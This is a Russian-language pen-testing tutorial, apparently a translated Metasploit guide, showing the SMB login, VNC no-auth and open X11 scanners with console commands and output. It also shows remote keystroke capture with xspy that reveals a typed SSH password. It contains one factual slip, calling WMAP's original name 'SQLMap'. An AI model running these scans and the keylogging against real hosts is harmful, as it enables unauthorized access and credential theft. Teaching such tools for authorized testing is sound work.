Сканирование на уязвимости.

Сканирование на уязвимости позволяет быстро проверить диапазон IP адресов на наличие тех или иных брешей в безопасности, давая представление о возможностях нападения. При правильном использовании, это является огромным преимуществом для пен-тестера. Так-же данное сканирование известно достаточно высокими срабатываниями ложно-положительных и ложно-отрицательных результатов. Это необходимо учитывать при работе с любым сканером уязвимостей.
Этот раздел описывает некоторые возможности, которые Metasploit Framework может предоставить в качестве сканера уязвимостей.

SMB Login Check.

Типичная ситуация, где действующие логин и пароль могут быть полезны, это сканер SMB Login Check. Сканер может сослужить очень хорошую службу, поскольку он будет подключаться к различным хостам по протоколу SMB и определять, является ли имя пользователя и пароль валидными для доступа к цели.
Имейте ввиду, что такое сканирование «очень шумное», каждый раз при неудачной попытки присоединиться, создается соответствующая запись в журнале Windows. Следствием любых успешных результатов может быть использован модуль эксплоита windows/smb/psexec (как отдельный инструмент) для создания сессий подключения к хосту.

msf > use scanner/smb/login
msf auxiliary(login) > show options
 
Module options:
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        SMB Domain
   SMBPass                     no        SMB Password
   SMBUser    Administrator    no        SMB Username
   THREADS    1                yes       The number of concurrent threads
 
msf auxiliary(login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(login) > set SMBUser victim
SMBUser => victim
msf auxiliary(login) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(login) > set THREADS 50
THREADS => 50
msf auxiliary(login) > run
 
[*] 192.168.1.100 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.111 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.114 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.125 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.116 - SUCCESSFUL LOGIN (Unix)
[*] Auxiliary module execution completed
msf auxiliary(login) >

Без парольная аутентификация в VNC.

VNC сканер будет искать хосты с установленными серверами VNC, настроенными с без парольной аутентификацией. Хороший администратор всегда устанавливает на входящие соединения пароль, но вы никогда не предугадаете как может повезти с найденным без парольным сервером. В результате пен-теста, в таком случае, можно камня на камне не оставить от уязвимой системы.
Для использования сканера VNC, нам сначала нужно выбрать дополнительный модуль, задать опции и запустить сканер.

msf auxiliary(vnc_none_auth) > use scanner/vnc/vnc_none_auth
msf auxiliary(vnc_none_auth) > show options
 
Module options:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    5900             yes       The target port
   THREADS  1                yes       The number of concurrent threads
 
msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(vnc_none_auth) > set THREADS 50
THREADS => 50
msf auxiliary(vnc_none_auth) > run
 
[*] 192.168.1.121:5900, VNC server protocol version : RFB 003.008
[*] 192.168.1.121:5900, VNC server security types supported : None, free access!
[*] Auxiliary module execution completed

Открытый X11.

Также как сканер «vnc_auth», «Open_X11» сканер позволяет сканировать диапазон IP адресов на наличие серверов X11, позволяющих подключение пользователей без аутентификации. Подумайте о разрушительных действиях от атаки, которая может быть проведена в результате этой грубой ошибки конфигурации.
Для задействования этого метода мы опять выбираем вспомогательный модуль, определяем параметры и запускаем.

msf > use scanner/x11/open_x11
msf auxiliary(open_x11) > show options
 
Module options:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads
 
msf auxiliary(open_x11) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(open_x11) > set THREADS 50
THREADS => 50
msf auxiliary(open_x11) > run
[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2
...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32
...
[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed

В качестве примера того, чтобы мы смогли сделать далее, а именно, запустить клавиатурный шпион.

root@bt4:/# cd /pentest/sniffers/xspy/
root@bt4:/pentest/sniffers/xspy# ./xspy -display 192.168.1.101:0 -delay 100
 
ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit

WMAP Web Scanner.

WMAP это сканер веб-уязвимостей, оригинальное название которого «SQLMap». Эта утилита позволяет при сканировании задействовать кэшированные данные прокси сервера. Для начала, нам нужно скачать и установить поддерживаемый Metasploit прокси сервер и применить к нему патч совместимости. Также необходимо установить, если потребуется, rubygems и ruby-sqlite3.